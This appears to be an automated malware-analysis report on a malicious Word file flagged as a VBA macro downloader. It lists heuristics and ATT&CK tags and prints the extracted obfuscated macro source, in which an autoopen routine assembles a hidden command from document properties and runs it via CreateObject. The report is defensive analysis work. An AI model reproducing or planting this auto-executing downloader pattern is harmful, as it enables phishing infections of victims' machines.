MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. Heuristics indicate the presence of an auto-executing macro (autoopen) that uses CreateObject to execute code. The ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0' strongly suggests a downloader functionality. The VBA script itself is heavily obfuscated, but the overall pattern points to a macro-based downloader, likely delivered via spearphishing.
Heuristics 8
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
YTHWZxEskz = "zExwxzAP" CreateObject(wEYsydCMR + tkPeGAxRD("UvsbWRaZ") + tkPeGAxRD("tLPTAcsUNaN")).Run$ bxfPFxDXbd + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + pBPDRmLawT, 0 NxgdKKUnwX = "VceynAsThL" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() ZzdFcTUpSnH -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7822 bytes |
SHA-256: 4a6565101df3431dc2a77915e1d7c0523231c3b197d4217fe79dc21a78cc881b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
193 of 227 identifiers look randomly generated (e.g. 'CbndMnKPgXm') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function mSctUBbwrzm()
Dim htRsxmzHY()
ydhzCwSzZNP = 3378
ReDim htRsxmzHY(3378)
htRsxmzHY(299) = VsYttgLUDNu
htRsxmzHY(1320) = sUBTxHYa
htRsxmzHY(2033) = NcrMapfswdm
htRsxmzHY(1540) = menkHnpVd
htRsxmzHY(1452) = SUttrMrVXVN
htRsxmzHY(986) = 8910
htRsxmzHY(2786) = 6228
htRsxmzHY(121) = 8204
htRsxmzHY(567) = 2643
For ydhzCwSzZNP = 2983 To 1168
htRsxmzHY(ydhzCwSzZNP) = ydhzCwSzZNP
Next
End Function
Function ceRfBYUS()
Dim gKDxgFtvDr()
apbDNpXwuGU = 1775
ReDim gKDxgFtvDr(1775)
gKDxgFtvDr(1124) = fCvpRGCZcBH
gKDxgFtvDr(168) = LunAUtbvwMU
gKDxgFtvDr(785) = FMaYCEVRdH
gKDxgFtvDr(1731) = gDrfUcuYwV
gKDxgFtvDr(610) = DaUFgxtyuXg
gKDxgFtvDr(1772) = duNzuHhAW
gKDxgFtvDr(1402) = 2754
gKDxgFtvDr(1003) = 1774
gKDxgFtvDr(469) = 5778
gKDxgFtvDr(1325) = 5522
For apbDNpXwuGU = 896 To 1182
gKDxgFtvDr(apbDNpXwuGU) = apbDNpXwuGU
Next
End Function
Function XWcwgDdHeC()
Dim cxwzRhTETKM()
LaYpYTYRZLP = 1081
ReDim cxwzRhTETKM(1081)
cxwzRhTETKM(861) = yUxySggNCE
cxwzRhTETKM(293) = KkcDLTDDA
cxwzRhTETKM(455) = 9350
cxwzRhTETKM(485) = 1971
cxwzRhTETKM(196) = 8423
cxwzRhTETKM(517) = 8819
cxwzRhTETKM(1046) = 4041
For LaYpYTYRZLP = 316 To 498
cxwzRhTETKM(LaYpYTYRZLP) = LaYpYTYRZLP
Next
End Function
Function skFHhGPFgw()
Dim WGVZwxaDdWv()
UCcuxkXC = 470
ReDim WGVZwxaDdWv(470)
WGVZwxaDdWv(103) = xcSMnhDhr
WGVZwxaDdWv(204) = FFcrKfzDC
WGVZwxaDdWv(415) = HteAPErhb
WGVZwxaDdWv(467) = 1698
WGVZwxaDdWv(314) = 8005
WGVZwxaDdWv(212) = 9581
WGVZwxaDdWv(465) = 4663
For UCcuxkXC = 219 To 104
WGVZwxaDdWv(UCcuxkXC) = UCcuxkXC
Next
End Function
Function rnKNcGMwv()
Dim XPUBHTcHVzT()
CbndMnKPgXm = 9469
ReDim XPUBHTcHVzT(9469)
XPUBHTcHVzT(7780) = tzmhdVHtPnV
XPUBHTcHVzT(5348) = heEsTytbS
XPUBHTcHVzT(8819) = 3507
XPUBHTcHVzT(2569) = 6574
XPUBHTcHVzT(7808) = 7183
XPUBHTcHVzT(6326) = 7955
For CbndMnKPgXm = 4878 To 7448
XPUBHTcHVzT(CbndMnKPgXm) = CbndMnKPgXm
Next
End Function
Function EPtgGUtU()
Dim keUGPBHtZ()
dtzzaTsrhSY = 7137
ReDim keUGPBHtZ(7137)
keUGPBHtZ(604) = ffgGegDDvY
keUGPBHtZ(2884) = sXzZKVgzf
keUGPBHtZ(5943) = AFCRcHMpS
keUGPBHtZ(6260) = TKXLSTxXUrt
keUGPBHtZ(2317) = gxLdUZfpeww
keUGPBHtZ(5775) = 4533
keUGPBHtZ(5934) = 840
keUGPBHtZ(1863) = 4124
keUGPBHtZ(2792) = 8957
keUGPBHtZ(728) = 3387
keUGPBHtZ(2301) = 5989
For dtzzaTsrhSY = 7116 To 1630
keUGPBHtZ(dtzzaTsrhSY) = dtzzaTsrhSY
Next
End Function
Sub autoopen()
ZzdFcTUpSnH
End Sub
Public Function tkPeGAxRD(UgMphfCgv)
WydvDKZmx = "FNwaFVde"
UxrsZLmsE = "YcFgPEGbZLt"
EuEkhBYKrbN = "NDsBpVUPYuF"
MXEUemYF = "BfAvyvYC"
hPfpSyLP = "mAYDhBDMGy"
RKBSeaXCE = "nmEDzYrs"
tkPeGAxRD = ActiveDocument.CustomDocumentProperties(UgMphfCgv) + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + GSkYvgGWAKd
kUGaMSPT = "sAhzyWuFGFE"
GaMkEbnF = "wzuHNPrHx"
xUwfkAyC = "dPpzsECu"
zyxAksfL = "UbsZFrpwMnu"
End Function
Public Function bxfPFxDXbd()
vygDKYTuv = "KrVVrpUEWT"
csGHdySk = "ThEYVbwLWf"
fRRNMsWGG = "YxKafpsbZ"
UVtRusuv = "zXpHUYaXFZ"
GPCYctuM = "AshWCahCV"
NGcHtWZayu = tkPeGAxRD("hkKWzTgLA") + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + tkPeGAxRD("ntuMMhpc") + tkPeGAxRD("aGnZEVzUK") + tkPeGAxRD("HZSgvhvr")
cYpYRXYDPKh = "nDuHskDW"
CMmDvVdNS = "MEPPynhy"
NTkpAavRKt = "cYwrxwMC"
tzgPxrStR = tkPeGAxRD("dcTwrGNtUB") + tkPeGAxRD("sXutsPNKt") + tkPeGAxRD("uvCAgBCPH") + tkPeGAxRD("RLPxYBms") + tkPeGAxRD("bnpNUtDM")
YKEyWgwDmSd = tzgPxrStR + NGcHtWZayu
zaGMAfTuA = "fXcnnGeEydM"
nhsDhGRKLC = "GbXGAanFY"
ttGffTSh = "PPFKTNDx"
rDHxagvMs = "tuXDERBCP"
DRrghwtT = "RGnndgALRNs"
MAadnrKbGkc = "TyfscsEC"
LUMCfdAWs = "mWuGDUWagu"
bxfPFxDXbd = YKEyWgwDmSd + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function wEYsydCMR()
wEYsydCMR = tkPeGAxRD("dzdmCAZkmD") + tkPeGAxRD("wzcDDwRWC") + tkPeGAxRD("awrkVYbYZ") + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + VNHMKmZYdG
ApZCuuXHXsb = "FhnepMzGTp"
ARwMHsgZhXU = "AcPXwcKpLYh"
zZNNzZgPcTV = "KndEWWNvC"
SbTbHMNC = "YpzALhcCh"
FXmgNMMz = "XYysGdwfX"
YaxndVdhmF = "kKzRUZTd"
vXnCXHTtH = "gEZZxMaZzBV"
End Function
Public Function ZzdFcTUpSnH()
XBcAMBkSE = "KnGHPxeTD"
BSuFATURmv = "UwfuuaXDyE"
feZbEkcCTh = "XfwYPVUh"
fzSNhzPLctW = "rfgubcBcX"
fMUdFMTtVz = "eYEtdWVX"
DvuGEUnXZTG = "ySAUmfkv"
bSNYrLUV = "ZCsXUzSpfU"
YTHWZxEskz = "zExwxzAP"
CreateObject(wEYsydCMR + tkPeGAxRD("UvsbWRaZ") + tkPeGAxRD("tLPTAcsUNaN")).Run$ bxfPFxDXbd + yDcxsyGG + pxhNYzrbXWy + CSLBHmTuAs + sSPNYzbgYzh + eTfmWEZGVDv + rxcGUxDkyUR + EMeTuYAz + urmsCpkZB + uxBDfTNVrrD + HrUpYsad + pBPDRmLawT, 0
NxgdKKUnwX = "VceynAsThL"
BnzTUABTPkB = "mRvnVfyab"
End Function
Function pMMfvFeNA()
Dim RpGtGvpVmG()
vdTHBPtvhx = 2068
ReDim RpGtGvpVmG(2068)
RpGtGvpVmG(986) = UyywdkpM
RpGtGvpVmG(202) = ZsvncbKV
RpGtGvpVmG(1793) = HRYYTAEr
RpGtGvpVmG(380) = rLNfWBKXfW
RpGtGvpVmG(559) = TThCXBzeW
RpGtGvpVmG(1587) = tYNmaxHK
RpGtGvpVmG(1436) = 7358
RpGtGvpVmG(1768) = 1254
RpGtGvpVmG(1209) = 8168
RpGtGvpVmG(1306) = 871
RpGtGvpVmG(1505) = 7166
For vdTHBPtvhx = 657 To 207
RpGtGvpVmG(vdTHBPtvhx) = vdTHBPtvhx
Next
End Function
Function aaCaBrAgzpg()
Dim PWChWYVCsA()
ZbyRNcKVhXM = 2637
ReDim PWChWYVCsA(2637)
PWChWYVCsA(2489) = DBsBTXtmh
PWChWYVCsA(215) = eXNmVtEnfWs
PWChWYVCsA(1936) = bLSNDyLG
PWChWYVCsA(1385) = VKUhwDZKSmK
PWChWYVCsA(2218) = MPAxhrWVrzM
PWChWYVCsA(2169) = yFsSvczWH
PWChWYVCsA(333) = 4407
PWChWYVCsA(130) = 5832
PWChWYVCsA(2164) = 9917
PWChWYVCsA(1634) = 3645
For ZbyRNcKVhXM = 1336 To 2454
PWChWYVCsA(ZbyRNcKVhXM) = ZbyRNcKVhXM
Next
End Function
Function NbvEGDucH()
Dim LfywBmCnT()
AeErrFgEhpL = 8564
ReDim LfywBmCnT(8564)
LfywBmCnT(3128) = pMDVpBpVR
LfywBmCnT(6410) = AbKLLdsbv
LfywBmCnT(6667) = SsEVNrycCS
LfywBmCnT(1124) = VxgPhkeBxS
LfywBmCnT(1457) = CCUMSDsYDXs
LfywBmCnT(1090) = GSdNwZDuvY
LfywBmCnT(6574) = 8992
LfywBmCnT(2847) = 5731
For AeErrFgEhpL = 8370 To 3582
LfywBmCnT(AeErrFgEhpL) = AeErrFgEhpL
Next
End Function
Function LrCsepMWn()
Dim BmcbCwkgW()
SyTNNVKh = 878
ReDim BmcbCwkgW(878)
BmcbCwkgW(497) = mCDThkhECB
BmcbCwkgW(256) = KwMdvvzx
BmcbCwkgW(874) = FNuLhPYKsXt
BmcbCwkgW(278) = 6724
BmcbCwkgW(75) = 9171
BmcbCwkgW(171) = 4276
BmcbCwkgW(312) = 7931
BmcbCwkgW(762) = 97
BmcbCwkgW(120) = 5368
For SyTNNVKh = 321 To 464
BmcbCwkgW(SyTNNVKh) = SyTNNVKh
Next
End Function
Function MKFgaHku()
Dim mHYXULzddcM()
gPkVHXCwZbn = 1289
ReDim mHYXULzddcM(1289)
mHYXULzddcM(219) = vVMxkAbF
mHYXULzddcM(141) = ScEHAKAeH
mHYXULzddcM(70) = YkBbCNsyx
mHYXULzddcM(372) = DYGNyXXwk
mHYXULzddcM(73) = bGgXGUeK
mHYXULzddcM(1049) = 267
mHYXULzddcM(960) = 3897
mHYXULzddcM(91) = 7003
mHYXULzddcM(536) = 6918
mHYXULzddcM(1231) = 6202
For gPkVHXCwZbn = 1078 To 540
mHYXULzddcM(gPkVHXCwZbn) = gPkVHXCwZbn
Next
End Function
Function xAWymPes()
Dim zHVnvmUZ()
wbMXXwgVn = 9892
ReDim zHVnvmUZ(9892)
zHVnvmUZ(1455) = PMWcBESfUy
zHVnvmUZ(212) = xBwEuGcp
zHVnvmUZ(8344) = bWMPNtKv
zHVnvmUZ(8983) = 9250
zHVnvmUZ(4057) = 9164
zHVnvmUZ(2151) = 2546
For wbMXXwgVn = 9412 To 5925
zHVnvmUZ(wbMXXwgVn) = wbMXXwgVn
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.